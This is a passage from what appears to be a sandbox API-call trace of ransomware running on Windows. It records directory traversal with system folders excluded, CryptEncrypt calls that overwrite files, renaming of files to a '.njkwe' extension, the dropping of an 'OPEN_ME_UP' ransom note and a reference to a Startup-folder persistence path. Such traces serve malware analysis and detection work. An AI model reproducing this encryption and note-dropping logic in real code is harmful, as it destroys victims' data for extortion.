hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.421] FindNextFileW (in: hFindFile=0xc19da0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0061.421] FindClose (in: hFindFile=0xc19da0 | out: hFindFile=0xc19da0) returned 1 [0061.422] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1041\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0061.422] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1041\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.422] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0061.423] CloseHandle (hObject=0x428) returned 1 [0061.423] GetProcessHeap () returned 0xbe0000 [0061.423] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0061.423] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1042", cAlternateFileName="")) returned 1 [0061.423] lstrcmpiW (lpString1="1042", lpString2="Windows") returned -1 [0061.423] lstrcmpiW (lpString1="1042", lpString2="$Recycle.bin") returned 1 [0061.423] lstrcmpiW (lpString1="1042", lpString2="System Volume Information") returned -1 [0061.423] lstrcmpiW (lpString1="1042", lpString2="Program Files") returned -1 [0061.423] lstrcmpiW (lpString1="1042", lpString2="Program Files (x86)") returned -1 [0061.423] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1042") returned 30 [0061.423] lstrcmpW (lpString1="1042", lpString2=".") returned 1 [0061.423] lstrcmpW (lpString1="1042", lpString2="..") returned 1 [0061.423] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1042", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0061.423] GetProcessHeap () returned 0xbe0000 [0061.423] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0061.423] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1042\\*") returned 32 [0061.423] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ee0 [0061.424] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0061.424] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0061.424] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0061.424] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0061.424] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0061.424] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1042\\.") returned 32 [0061.424] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.424] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0061.424] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0061.424] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0061.424] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0061.424] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0061.424] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0061.424] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1042\\..") returned 33 [0061.424] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.424] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.424] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x318f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.424] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0061.424] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0061.424] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0061.425] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0061.425] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0061.425] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 39 [0061.425] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0061.425] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.425] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0061.425] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.425] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.425] GetTickCount () returned 0x114fc91 [0061.425] GetTickCount () returned 0x114fc91 [0061.425] GetTickCount () returned 0x114fc91 [0061.425] GetTickCount () returned 0x114fc91 [0061.425] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.425] GetProcessHeap () returned 0xbe0000 [0061.425] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.425] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.427] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.427] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.428] GetProcessHeap () returned 0xbe0000 [0061.428] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.428] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.428] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.428] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.428] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.428] CloseHandle (hObject=0x42c) returned 1 [0061.429] GetProcessHeap () returned 0xbe0000 [0061.429] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.429] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0061.429] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0061.431] GetProcessHeap () returned 0xbe0000 [0061.431] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.431] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xfed6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.431] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0061.431] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0061.431] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0061.431] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0061.431] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0061.431] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 48 [0061.431] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0061.431] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.431] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0061.431] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.431] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.432] GetTickCount () returned 0x114fc91 [0061.432] GetTickCount () returned 0x114fc91 [0061.432] GetTickCount () returned 0x114fc91 [0061.432] GetTickCount () returned 0x114fc91 [0061.432] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.432] GetProcessHeap () returned 0xbe0000 [0061.432] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.432] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.440] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.440] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.440] GetProcessHeap () returned 0xbe0000 [0061.440] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.440] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.441] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.441] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.441] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.441] CloseHandle (hObject=0x42c) returned 1 [0061.443] GetProcessHeap () returned 0xbe0000 [0061.443] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.443] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0061.443] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0061.444] GetProcessHeap () returned 0xbe0000 [0061.444] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.444] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.444] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0061.444] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0061.444] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0061.444] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0061.444] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0061.444] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 49 [0061.444] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0061.444] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.444] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0061.444] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1042\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.444] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.444] GetTickCount () returned 0x114fca1 [0061.444] GetTickCount () returned 0x114fca1 [0061.444] GetTickCount () returned 0x114fca1 [0061.444] GetTickCount () returned 0x114fca1 [0061.444] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.444] GetProcessHeap () returned 0xbe0000 [0061.444] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.444] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.446] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.446] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.446] GetProcessHeap () returned 0xbe0000 [0061.446] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.446] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.447] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.447] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.447] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.447] CloseHandle (hObject=0x42c) returned 1 [0061.448] GetProcessHeap () returned 0xbe0000 [0061.448] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.448] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1042\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0061.448] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0061.448] GetProcessHeap () returned 0xbe0000 [0061.448] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.448] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0061.448] FindClose (in: hFindFile=0xc19ee0 | out: hFindFile=0xc19ee0) returned 1 [0061.448] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1042\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0061.448] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1042\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.449] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0061.450] CloseHandle (hObject=0x428) returned 1 [0061.450] GetProcessHeap () returned 0xbe0000 [0061.450] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0061.450] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1043", cAlternateFileName="")) returned 1 [0061.450] lstrcmpiW (lpString1="1043", lpString2="Windows") returned -1 [0061.450] lstrcmpiW (lpString1="1043", lpString2="$Recycle.bin") returned 1 [0061.450] lstrcmpiW (lpString1="1043", lpString2="System Volume Information") returned -1 [0061.450] lstrcmpiW (lpString1="1043", lpString2="Program Files") returned -1 [0061.450] lstrcmpiW (lpString1="1043", lpString2="Program Files (x86)") returned -1 [0061.450] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1043") returned 30 [0061.450] lstrcmpW (lpString1="1043", lpString2=".") returned 1 [0061.450] lstrcmpW (lpString1="1043", lpString2="..") returned 1 [0061.450] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1043", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0061.450] GetProcessHeap () returned 0xbe0000 [0061.450] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0061.450] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1043\\*") returned 32 [0061.450] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ea0 [0061.450] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0061.450] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0061.450] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0061.450] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0061.450] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0061.450] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1043\\.") returned 32 [0061.450] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.451] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, 